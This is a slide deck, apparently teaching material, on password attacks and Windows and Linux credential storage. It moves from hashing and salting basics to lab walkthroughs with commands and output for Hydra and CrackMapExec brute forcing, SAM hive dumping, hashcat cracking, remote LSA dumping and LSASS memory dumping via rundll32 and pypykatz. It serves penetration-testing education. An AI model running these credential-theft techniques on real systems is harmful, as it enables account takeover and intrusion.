Password Attacks

@mmar

Hassan 1
 Authentication

Passwords

Brute Force Dictionary

 A brute force attack tries Attacks A dictionary attack

different characters until a compares a captured
match is found password to words in a file

Tools like john the ripper and Hashcat can be configured to execute both types of
attacks
Hassan
 Authentication

Passwords
Online Attack Offline Attack Defense
 steal a copy of the  Rate-limit online
password file and try guesses
 Try to log in as the user  Perhaps lock out the
on your own machine
with different passwords (or on many account—but that
compromised leaves you vulnerable to
(Brute force/ Dictionary) DoS attacks
machines—including
their GPUs)  Make password-
guessing inherently
• Note: that’s why we read-protect slow: use a slow
the hashed passwords algorithm
Hassan
 Authentication

Passwords How to Store Passwords

 Dictionary attack could input one value after another from a dictionary
into a hash function as a way by which to break it
 Brute-force attack could attempt to sequentially feed one character after
another to attempt to break the password
 Rainbow tables are another threat, whereby the adversary has a table of
all the potential hashed values in a hash table. This, however, would take
terabytes, if not petabytes, of storage capacity to accomplish
Hassan
 Authentication

Salting Defeating Rainbow Tables

 Salting is a process by which an added value is “sprinkled” into the hash
function, such that a hash value changes
 The utilization of a salt value nearly guarantees that the hash values
provided by users, even those that have the same passwords, receive a
different hashed password. Therefore, again, the cost for adversaries to
crack these passwords is quite costly
 NIST recommends that memorized secrets be both hashed and salted
Hassan
 Authentication

Salting Defeating Rainbow Tables

Hassan
Credentials Storage

Hassan 7
 Credential Storage

 Every application that supports authentication mechanisms compares the

given entries/credentials with local or remote databases. In the case of
local databases, these credentials are stored locally on the system
 Web applications are often vulnerable to SQL injections, which can lead to
the worst-case scenario where the attackers view the entirety of an
organization's data in plain text

Hassan
 Credential Storage

 There are many different wordlists that contain the most commonly used
passwords. An example of one of these lists is rockyou.txt. This list
includes about 14 million unique passwords, and it was created after a
data breach of the company RockYou, which contained a total of 32
million user accounts

Hassan
 Credential Storage

LINUX

 Linux-based systems handle everything in the form of a file. Accordingly,

passwords are also stored encrypted in a file. This file is called the shadow file
and is located in /etc/shadow and is part of the Linux user management
system. In addition, these passwords are commonly stored in the form of
hashes

Hassan
 Credential Storage

LINUX

 The /etc/shadow file has a unique format in which the entries are entered and
saved when new users are created.

Hassan
 Credential Storage

LINUX

 The encryption of the password in this file is formatted as follows:

Hassan
 Credential Storage

LINUX

 The type (id) is the cryptographic hash method used to encrypt the password.
Many different cryptographic hash methods were used in the past and are still
used by some systems today ID Cryptographic Hash Algorithm
$1$ MD5
$2a$ Blowfish
$5$ SHA-256
$6$ SHA-512
$sha1$ SHA1crypt
$y$ Yescrypt
$gy$ Gost-yescrypt
$7$ Scrypt

Hassan
 Credential Storage

LINUX

 A few more files belong to the user management system of Linux. The other
two files are /etc/passwd and /etc/group. In the past, the encrypted password
was stored together with the username in the /etc/passwd file, but this was
increasingly recognized as a security problem because the file can be viewed
by all users on the system and must be readable. The /etc/shadow file can only
be read by the user root

Hassan
 Credential Storage

LINUX
hassan@htb[/htb]$ cat /etc/passwd
htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash

Hassan
 Credential Storage

LINUX

 Opasswd
 The file where old passwords are stored is the /etc/security/opasswd.
Administrator/root permissions are also required to read the file if the
permissions for this file have not been changed manually
ammar@htb[/htb]$ sudo cat /etc/security/opasswd

cry0l1t3:1000:2:$1$HjFAfYTG$qNDkF0zJ3v8ylCOrKB0kt0,$1$kcUjWZJX$E9uMSmiQeRh4pAAgzuvkq1

Hassan
 Credential Storage

Windows

 The Windows client authentication process can oftentimes be more

complicated than with Linux systems and consists of many different modules
that perform the entire logon, retrieval, and verification processes. In addition,
there are many different and complex authentication procedures on the
Windows system, such as Kerberos authentication

Hassan
 Credential Storage

Windows

 The Local Security Authority (LSA) is a protected subsystem that authenticates

users and logs them into the local computer. In addition, the LSA maintains
information about all aspects of local security on a computer

Hassan
 Credential Storage

Windows

 The security subsystem keeps track of the security policies and accounts that
reside on a computer system. In the case of a Domain Controller, these policies
and accounts apply to the domain where the Domain Controller is located.
These policies and accounts are stored in Active Directory. In addition, the LSA
subsystem provides services for checking access to objects, checking user
permissions, and generating monitoring messages

Hassan
Credential Storage

Windows

Hassan
 Credential Storage

Windows

 Local interactive logon is performed by the interaction between the logon

process (WinLogon), the logon user interface process (LogonUI), the credential
providers, LSASS, one or more authentication packages, and SAM or Active
Directory. Authentication packages, in this case, are the Dynamic-Link Libraries
(DLLs) that perform authentication checks. For example, for non-domain joined
and interactive logins, the authentication package Msv1_0.dll is used

Hassan
 Credential Storage

Windows
Winlogon
 Winlogon is a trusted process responsible for managing security-related user
interactions. These include:
 Launching LogonUI to enter passwords at login
 Changing passwords
 Locking and unlocking the workstation
 It relies on credential providers installed on the system to obtain a user's
account name or password. Credential providers are COM objects that are
located in DLLs
Hassan
 Credential Storage

Windows
Winlogon
 Winlogon is the only process that intercepts login requests from the keyboard
sent via an RPC message from Win32k.sys. Winlogon immediately launches
the LogonUI application at logon to display the user interface for logon. After
Winlogon obtains a user name and password from the credential providers, it
calls LSASS to authenticate the user attempting to log in

Hassan
 Credential Storage

Windows
LSASS
 Local Security Authority Subsystem Service (LSASS) is a collection of many
modules and has access to all authentication processes that can be found in
%SystemRoot%\System32\Lsass.exe. This service is responsible for the local
system security policy, user authentication, and sending security audit logs to
the Event log. In other words, it is the vault for Windows-based operating
systems

Hassan
 Credential Storage

Windows
LSASS
Authentication
Packages Description
Lsasrv.dll The LSA Server service both enforces security policies and acts as the
security package manager for the LSA. The LSA contains the Negotiate
function, which selects either the NTLM or Kerberos protocol after
determining which protocol is to be successful.
Msv1_0.dll Authentication package for local machine logons that don't require
custom authentication.
Samsrv.dll The Security Accounts Manager (SAM) stores local security accounts,
enforces locally stored policies, and supports APIs.
Kerberos.dll Security package loaded by the LSA for Kerberos-based authentication on
a machine.
Netlogon.dll Network-based logon service.
Ntdsa.dll This library is used to create new records and folders in the Windows
registry.

Hassan
 Credential Storage

Windows
SAM Database
 The Security Account Manager (SAM) is a database file in Windows operating
systems that stores users' passwords. It can be used to authenticate local and
remote users. SAM uses cryptographic measures to prevent unauthenticated
users from accessing the system. User passwords are stored in a hash format
in a registry structure as either an LM hash or an NTLM hash. This file is
located in %SystemRoot%/system32/config/SAM and is mounted on
HKLM/SAM. SYSTEM level permissions are required to view it.

Hassan
 Credential Storage

Windows
SAM Database
 Windows systems can be assigned to either a workgroup or domain during
setup. If the system has been assigned to a workgroup, it handles the SAM
database locally and stores all existing users locally in this database. However,
if the system has been joined to a domain, the Domain Controller (DC) must
validate the credentials from the Active Directory database (ntds.dit), which is
stored in %SystemRoot%\ntds.dit

Hassan
 Credential Storage

Windows
Credential Manager
 Credential Manager is a feature built-in to all Windows operating systems that
allows users to save the credentials they use to access various network
resources and websites. Saved credentials are stored based on user profiles in
each user's Credential Locker. Credentials are encrypted and stored at the
following location:

PS C:\Users\[Username]\AppData\Local\Microsoft\[Vault/Credentials]\

Hassan
 Credential Storage

Windows
NTDS
 It is very common to come across network environments where Windows
systems are joined to a Windows domain. This is common because it makes it
easier for admins to manage all the systems owned by their respective
organizations (centralized management). In these cases, the Windows systems
will send all logon requests to Domain Controllers that belong to the same
Active Directory forest. Each Domain Controller hosts a file called NTDS.dit

Hassan
 Credential Storage

Windows
NTDS
 NTDS.dit is a database file that stores the data in Active Directory, including but
not limited to:
 User accounts (username & password hash)
 Group accounts
 Computer accounts
 Group policy objects

Hassan
 John The Ripper

 John the Ripper (JTR or john) is an essential pentesting tool used to check
the strength of passwords and crack encrypted (or hashed) passwords
using either brute force or dictionary attacks. It is open-source software
initially developed for UNIX-based systems and first released in 1996. It
has become a staple of security professionals due to its various
capabilities.

Hassan
 John The Ripper

Usage

 The basic syntax for the command is

john --format=sha256 hashes_to_crack.txt Brute forcing

john --wordlist=<wordlist_file> --rules <hash_file> Dictionary

 First, we specify the wordlist file or files to use for cracking the password
hashes. The wordlist(s) can be in plain text format, with one word per line. Then
we can specify a rule set. These rules generate candidate passwords using
transformations such as appending numbers, capitalizing letters etc
Hassan
 John The Ripper

Cracking Files with John

 It is also possible to crack even password-protected or encrypted files with

John. We use additional tools that process the given files and produce hashes
that John can work with. It automatically detects the formats and tries to crack
them. The syntax for this can look like this:
cry0l1t3@htb:~$ <tool> <file_to_crack> > file.hash
cry0l1t3@htb:~$ pdf2john server_doc.pdf > server_doc.hash
cry0l1t3@htb:~$ john server_doc.hash
# OR
cry0l1t3@htb:~$ john --wordlist=<wordlist.txt> server_doc.hash

Hassan
 John The Ripper

Cracking Files with John

hassan@kali$ locate *2john*
 John can crack a number of
/usr/bin/bitlocker2john
file passwords /usr/bin/dmg2john
/usr/bin/gpg2john
/usr/bin/hccap2john
pdf2john Converts PDF documents for John
/usr/bin/keepass2john
ssh2john Converts SSH private keys for /usr/bin/putty2john
John
/usr/bin/racf2john
mscash2john Converts MS Cash hashes for John /usr/bin/rar2john
keychain2john Converts OS X keychain files for /usr/bin/uaf2john
John /usr/bin/vncpcap2john
rar2john Converts RAR archives for John /usr/bin/wlanhcx2john
/usr/bin/wpapcap2john
/usr/bin/zip2john
Hassan
 Network Services

 During our penetration tests, every computer network we encounter will

have services installed to manage, edit, or create content. All these
services are hosted using specific permissions and are assigned to specific
users. Apart from web applications, these services include (but are not
limited to): FTP SMB NFS
IMAP/POP3 SSH MySQL/MSSQL
RDP WinRM VNC
Telnet SMTP LDAP

All these services have an authentication mechanism using a username and password.

Hassan
WinRM

Hassan 36
 WinRM

 Windows Remote Management (WinRM) is the Microsoft implementation

of the network protocol Web Services Management Protocol (WS-
Management). It is a network protocol based on XML web services using
the Simple Object Access Protocol (SOAP) used for remote management
of Windows systems. WinRM uses the TCP ports 5985 (HTTP) and 5986
(HTTPS)

Hassan
 CrackMapExec

 CrackMapExec now Netexec is one of the favorite tools of hackers and

security professionals to crack network services passwords. The general
format for using CrackMapExec is as follows:
ammar@htb[/htb]$ crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>

Cracking winrm password

ammar@htb[/htb]$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)

WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)

Hassan
 Evil-WinRM

 Evil-WinRM can then be used to connect with the cracked credentials

ammar@htb[/htb]$ evil-winrm -i 10.129.42.197 -u user -p
password

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\user\Documents>

Hassan
 SSH

Hassan 40
 SSH

 Secure Shell (SSH) is a more secure way to connect to a remote host to

execute system commands or transfer files from a host to a server. The
SSH server runs on TCP port 22 by default, to which we can connect using
an SSH client. Hydra can be used to brute force the password
ammar@htb[/htb]$ hydra -L user.list -P password.list ssh://10.129.42.197

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak –

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://10.129.42.197:22/
[22][ssh] host: 10.129.42.197 login: user password: password
1 of 1 target successfully completed, 1 valid password found

Hassan
Remote Desktop Protocol (RDP)

Hassan 42
 Remote Desktop Protocol (RDP)

 Microsoft's Remote Desktop Protocol (RDP) is a network protocol that

allows remote access to Windows systems via TCP port 3389 by default.
RDP provides both users and administrators/support staff with remote
access to Windows hosts within an organization. The Remote Desktop
Protocol defines two participants for a connection: a so-called terminal
server, on which the actual work takes place, and a terminal client, via
which the terminal server is remotely controlled

Hassan
 Remote Desktop Protocol (RDP)

 We can also use Hydra to perform RDP bruteforcing.

ammar@htb[/htb]$ hydra -L user.list -P password.list rdp://10.129.42.197

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak -

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:05:40
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking rdp://10.129.42.197:3389/
[3389][rdp] account on 10.129.42.197 might be valid but account not active for remote desktop: login: mrb3n password: rockstar, continuing attacking the
account.
[3389][rdp] account on 10.129.42.197 might be valid but account not active for remote desktop: login: cry0l1t3 password: delta, continuing attacking the
account.
[3389][rdp] host: 10.129.42.197 login: user password: password
1 of 1 target successfully completed, 1 valid password found

Hassan
 Remote Desktop Protocol (RDP)

 We can also use Hydra to perform RDP bruteforcing.

ammar@htb[/htb]$ hydra -L user.list -P password.list rdp://10.129.42.197

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak -

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:05:40
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking rdp://10.129.42.197:3389/
[3389][rdp] account on 10.129.42.197 might be valid but account not active for remote desktop: login: mrb3n password: rockstar, continuing attacking the
account.
[3389][rdp] account on 10.129.42.197 might be valid but account not active for remote desktop: login: cry0l1t3 password: delta, continuing attacking the
account.
[3389][rdp] host: 10.129.42.197 login: user password: password
1 of 1 target successfully completed, 1 valid password found

Hassan
 Remote Desktop Protocol (RDP)

 Linux offers different clients to communicate with the desired server

using the RDP protocol. These include Remmina, rdesktop, xfreerdp, and
many others. For our purposes, we will work with xfreerdp.
ammar@htb[/htb]$ xfreerdp /v:10.129.42.197 /u:user /p:password

...SNIP...
New Certificate details:
Common Name: WINSRV
Subject: CN = WINSRV
Issuer: CN = WINSRV
Thumbprint: cd:91:d0:3e:7f:b7:bb:40:0e:91:45:b0:ab:04:ef:1e:c8:d5:41:42:49:e0:0c:cd:c7:dd:7d:08:1f:7c:fe:eb

Do you trust the above certificate? (Y/T/N) Y

Hassan
SMB

Hassan 47
 SMB

 We can use CrackMapExec to perform SMB bruteforcing

ammar@htb[/htb]$ crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

SMB 10.129.42.197 445 WINSRV [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB 10.129.42.197 445 WINSRV [+] WINSRV\user:password
SMB 10.129.42.197 445 WINSRV [+] Enumerated shares
SMB 10.129.42.197 445 WINSRV Share Permissions Remark
SMB 10.129.42.197 445 WINSRV ----- ----------- ------
SMB 10.129.42.197 445 WINSRV ADMIN$ Remote Admin
SMB 10.129.42.197 445 WINSRV C$ Default share
SMB 10.129.42.197 445 WINSRV SHARENAME READ,WRITE
SMB 10.129.42.197 445 WINSRV IPC$ READ Remote IPC

 We can also make use of Hydra and Metasploit frameworks to brute force
SMB

Hassan
 Password Mutations

 Many people create their passwords according to simplicity instead of

security. To eliminate this human weakness that often compromises
security measures, password policies can be created on all systems that
determine how a password should look. This means that the system
recognizes whether the password contains capital letters, special
characters, and numbers. In addition, most password policies require a
minimum length of eight characters in a password, including at least one
of the above specifications.
Hassan
 Password Mutations

 Unfortunately, the tendency for users to create weak passwords also

occurs despite the existence of password policies. Most
people/employees follow the same rules when creating more complex
passwords. Passwords are often created closely related to the service
used. This means that many employees often select passwords that can
have the company's name in the passwords. A person's preferences and
interests also play a significant role. These can be pets, friends, sports,
hobbies, and many other elements of life
Hassan
 Password Mutations

 Commonly, users use the following additions for their password to fit the
most common password policies:
Description Password Syntax
First letter is uppercase. Password
Adding numbers. Password123
Adding year. Password2022
Adding month. Password02
Last character is an Password2022!
exclamation mark.
Adding special characters. P@ssw0rd2022!

Hassan
 Password Mutations

 Based on statistics provided by WPengine, most password lengths are not

longer than ten characters. So what we can do is to pick specific terms
that are at least five characters long and seem to be the most familiar to
the users, such as the names of their pets, hobbies, preferences, and
other interests. If the user chooses a single word (such as the current
month), adds the current year, followed by a special character, at the end
of their password, we would reach the ten-character password
requirement
Hassan
 Password Mutations

 We can use a very powerful tool called Hashcat to combine lists of

potential names and labels with specific mutation rules to create custom
wordlists Function Description
: Do nothing.
l Lowercase all letters.
u Uppercase all letters.
c Capitalize the first letter and
lowercase others.
sXY Replace all instances of X with
Y.
$! Add the exclamation
character at the end.
Hassan
 Custom Wordlists

 We can now use another tool called CeWL to scan potential words from
the company's website and save them in a separate list. We can then
combine this list with the desired rules and create a customized password
list that has a higher probability of guessing a correct password. We
specify some parameters, like the depth to spider (-d), the minimum
length of the word (-m), the storage of the found words in lowercase (--
lowercase), as well as the file where we want to store the results (-w).

Hassan
 Custom Wordlists

[!bash!]$ cewl https://www.inlanefreight.com -d 4 -m 6 --

lowercase -w inlane.wordlist
[!bash!]$ wc -l inlane.wordlist

326

Hassan
 Credential Stuffing

 Administrators have to keep track of all the technology, infrastructure,

and applications along with the data being accessed. In this case, the
same password is often used for configuration purposes, and then the
password is forgotten to be changed for one interface or another. In
addition, many applications that work with authentication mechanisms,
basically almost all, often come with default credentials after installation.
These default credentials may be forgotten to be changed after
configuration, especially when it comes to internal applications
Hassan
 Credential Stuffing

 There are various databases that keep a running list of known default
credentials. One of them is the DefaultCreds-Cheat-Sheet
 Attacking those services with the default or obtained credentials is called
Credential Stuffing. This is a simplified variant of brute-forcing because
only composite usernames and the associated passwords are used.
 we can create a new list that separates these composite credentials with a
colon (username:password)

Hassan
 Credential Stuffing

ammar@htb[/htb]$ hydra -C user_pass.list ssh://10.129.42.197

Hassan
Attacking SAM

Hassan 59
 Attacking SAM

 With access to a non-domain joined Windows system, we may benefit

from attempting to quickly dump the files associated with the SAM
database to transfer them to our attack host and start cracking hashes
offline. Doing this offline will ensure we can continue to attempt our
attacks without maintaining an active session with a target

Hassan
 Copying SAM Registry Hives

 There are three registry hives that we can copy if we have local admin
access on the target; each will have a specific purpose when we get to
dumping and cracking the hashes. Here is a brief description of each in
the table below
Registry Hive Description
hklm\sam Contains the hashes associated with local account passwords. We will need the hashes so we can crack
them and get the user account passwords in cleartext.
hklm\system Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to
decrypt the SAM database.
hklm\security Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined
Windows target.

Hassan
 Copying SAM Registry Hives

 We can create backups of these hives using the reg.exe utility.

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\system

C:\system.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\security

C:\security.save

The operation completed successfully.

Hassan
 Copying SAM Registry Hives

 Technically we will only need hklm\sam & hklm\system, but hklm\security

can also be helpful to save as it can contain hashes associated with
cached domain user account credentials present on domain-joined hosts.
Once the hives are saved offline, we can use various methods to transfer
them to our attack host

Hassan
 Dumping Hashes with Impacket's secretsdump.py

 One incredibly useful tool we can use to dump the hashes offline is
Impacket's secretsdump.py
ammar@htb[/htb]$ locate secretsdump

ammar@htb[/htb]$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system

system.save LOCAL

[*] Target system bootKey: 0x4d8c7cff8a543fbf245a363d2ffce518

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3dd5a5ef0ed25b8d6add8b2805cce06b:::
defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:683b72db605d064397cf503802b51857:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
sam:1002:aad3b435b51404eeaad3b435b51404ee:6f8c3f4d3869a10f3b4f0522f537fd33:::
rocky:1003:aad3b435b51404eeaad3b435b51404ee:184ecdda8cf1dd238d438c4aea4d560d:::
ITlocal:1004:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::

Hassan
 Adding nthashes to a .txt File

ammar@htb[/htb]$ sudo nano hashestocrack.txt

64f12cddaa88057e06a81b54e73b949b
31d6cfe0d16ae931b73c59d7e0c089c0
6f8c3f4d3869a10f3b4f0522f537fd33
184ecdda8cf1dd238d438c4aea4d560d
f7eb9c06fafaa23c4bcf22ba6781c1e2

Hassan
 Running Hashcat against NT Hashes

 Hashcat has many different ammar@htb[/htb]$ sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

modes we can use. Selecting a <SNIP>

f7eb9c06fafaa23c4bcf22ba6781c1e2:dragon

mode is largely dependent on the 6f8c3f4d3869a10f3b4f0522f537fd33:iloveme

184ecdda8cf1dd238d438c4aea4d560d:adrian
31d6cfe0d16ae931b73c59d7e0c089c0:

type of attack and hash type we

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: dumpedhashes.txt

want to crack
Time.Started.....: Tue Dec 14 14:16:56 2021 (0 secs)
Time.Estimated...: Tue Dec 14 14:16:56 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14284 H/s (0.63ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 5/5 (100.00%) Digests
Progress.........: 8192/14344385 (0.06%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: newzealand -> whitetiger

Started: Tue Dec 14 14:16:50 2021

Stopped: Tue Dec 14 14:16:58 2021

Hassan
 Remote Dumping

 With access to credentials with local admin privileges, it is also possible

for us to target LSA Secrets over the network. This could allow us to
extract credentials from a running service, scheduled task, or application
that uses LSA secrets to store passwords

Hassan
 Remote Dumping

ammar@htb[/htb]$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

SMB 10.129.42.198 445 WS01 [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB 10.129.42.198 445 WS01 [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!)
SMB 10.129.42.198 445 WS01 [+] Dumping LSA secrets
SMB 10.129.42.198 445 WS01 WS01\worker:Hello123
SMB 10.129.42.198 445 WS01 dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
SMB 10.129.42.198 445 WS01 NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b
SMB 10.129.42.198 445 WS01 [+] Dumped 3 LSA secrets to /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.cached

Hassan
 Remote Dumping

 We can also dump hashes from the SAM database remotely.

└─$ crackmapexec smb 10.129.254.107 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
SMB 10.129.254.107 445 FRONTDESK01 [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False)
(SMBv1:False)
SMB 10.129.254.107 445 FRONTDESK01 [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB 10.129.254.107 445 FRONTDESK01 [+] Dumping SAM hashes
SMB 10.129.254.107 445 FRONTDESK01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.254.107 445 FRONTDESK01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.254.107 445 FRONTDESK01 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.254.107 445 FRONTDESK01
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB 10.129.254.107 445 FRONTDESK01 bob:1001:aad3b435b51404eeaad3b435b51404ee:3c0e5d303ec84884ad5c3b7876a06ea6:::
SMB 10.129.254.107 445 FRONTDESK01 jason:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB 10.129.254.107 445 FRONTDESK01 ITbackdoor:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB 10.129.254.107 445 FRONTDESK01 frontdesk:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB 10.129.254.107 445 FRONTDESK01 [+] Added 8 SAM hashes to the database

Hassan
Attacking LSASS

Hassan 70
 Attacking LSASS

 LSASS is a critical service that plays a central role in credential

management and the authentication processes in all Windows operating
systems.

Hassan
 Attacking LSASS

 Upon initial logon, LSASS will:

 Cache credentials locally in memory
 Create access tokens
 Enforce security policies
 Write to Windows security log

Hassan
 Dumping LSASS Process Memory

 Similar to the process of attacking the SAM database, with LSASS, it would
be wise for us first to create a copy of the contents of LSASS process
memory via the generation of a memory dump. Creating a dump file lets
us extract credentials offline using our attack host. Keep in mind
conducting attacks offline gives us more flexibility in the speed of our
attack and requires less time spent on the target system. There are
countless methods we can use to create a memory dump

Hassan
 Dumping LSASS Process Memory

Task Manager
 Open Task Manager > Select the Processes tab > Find & right click the
Local Security Authority Process > Select Create dump file

Hassan
 Dumping LSASS Process Memory

Task Manager
 A file called lsass.DMP is created and saved in:

C:\Users\loggedonusersdirectory\AppData\Local\Temp

 This is the file we will transfer to our attack host

Hassan
 Dumping LSASS Process Memory

Rundll32.exe & Comsvcs.dll Method

 The Task Manager method is dependent on us having a GUI-based
interactive session with a target. We can use an alternative method to
dump LSASS process memory through a command-line utility called
rundll32.exe. This way is faster than the Task Manager method and more
flexible because we may gain a shell session on a Windows host with only
access to the command line. It is important to note that modern anti-virus
tools recognize this method as malicious activity
Hassan
 Dumping LSASS Process Memory

Rundll32.exe & Comsvcs.dll Method

 Before issuing the command to create the dump file, we must determine
what process ID (PID) is assigned to lsass.exe. This can be done from cmd
or PowerShell:
Finding LSASS PID in cmd

Hassan
 Dumping LSASS Process Memory

Rundll32.exe & Comsvcs.dll Method

Finding LSASS PID in PowerShell
PS C:\Windows\system32> Get-Process lsass

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName

------- ------ ----- ----- ------ -- -- -----------
1260 21 4948 15396 2.56 672 0 lsass

 Once we have the PID assigned to the LSASS process, we can create the
dump file.

Hassan
 Dumping LSASS Process Memory

Rundll32.exe & Comsvcs.dll Method

 With an elevated PowerShell session, we can issue the following
command to create the dump file:
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

 With this command, we are running rundll32.exe to call an exported

function of comsvcs.dll which also calls the MiniDumpWriteDump
(MiniDump) function to dump the LSASS process memory to a specified
directory (C:\lsass.dmp)
Hassan
 Dumping LSASS Process Memory

Using Pypykatz to Extract Credentials

 Once we have the dump file on our attack host, we can use a powerful
tool called pypykatz to attempt to extract credentials from the .dmp file.
Pypykatz is an implementation of Mimikatz written entirely in Python. The
fact that it is written in Python allows us to run it on Linux-based attack
hosts

Hassan
 Dumping LSASS Process Memory

Using Pypykatz to Extract Credentials

 Recall that LSASS stores credentials that have active logon sessions on
Windows systems. When we dumped LSASS process memory into the file,
we essentially took a "snapshot" of what was in memory at that point in
time. If there were any active logon sessions, the credentials used to
establish them will be present

Hassan
 Dumping LSASS Process Memory

Running Pypykatz
ammar@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp

INFO:root:Parsing file /home/peter/Documents/lsass.dmp

FILE: ======== /home/peter/Documents/lsass.dmp =======
== LogonSession ==
authentication_id 1354633 (14ab89)
session_id 2
username bob
domainname DESKTOP-33E7O54
logon_server WIN-6T0C3J2V6HP
logon_time 2021-12-14T18:14:25.514306+00:00
sid S-1-5-21-4019466498-1700476312-3544718034-1001
luid 1354633
== MSV ==
Username: bob
Domain: DESKTOP-33E7O54
LM: NA
NT: 64f12cddaa88057e06a81b54e73b949b
SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
DPAPI: NA
== WDIGEST [14ab89]==

Hassan
 Dumping LSASS Process Memory

Running Pypykatz
 The command initiates the use of pypykatz to parse the secrets hidden in
the LSASS process memory dump. We use lsa in the command because
LSASS is a subsystem of local security authority, then we specify the data
source as a minidump file, proceeded by the path to the dump file
(/home/peter/Documents/lsass.dmp) stored on our attack host. Pypykatz
parses the dump file and outputs the findings

Hassan
 Dumping LSASS Process Memory

MSV
 MSV is an authentication package in Windows
sid S-1-5-21-4019466498-1700476312-3544718034-1001
that LSA calls on to validate logon attempts luid 1354633
== MSV ==
against the SAM database. Pypykatz extracted Username: bob
Domain: DESKTOP-33E7O54
the SID, Username, Domain, and even the NT & LM: NA
NT: 64f12cddaa88057e06a81b54e73b949b
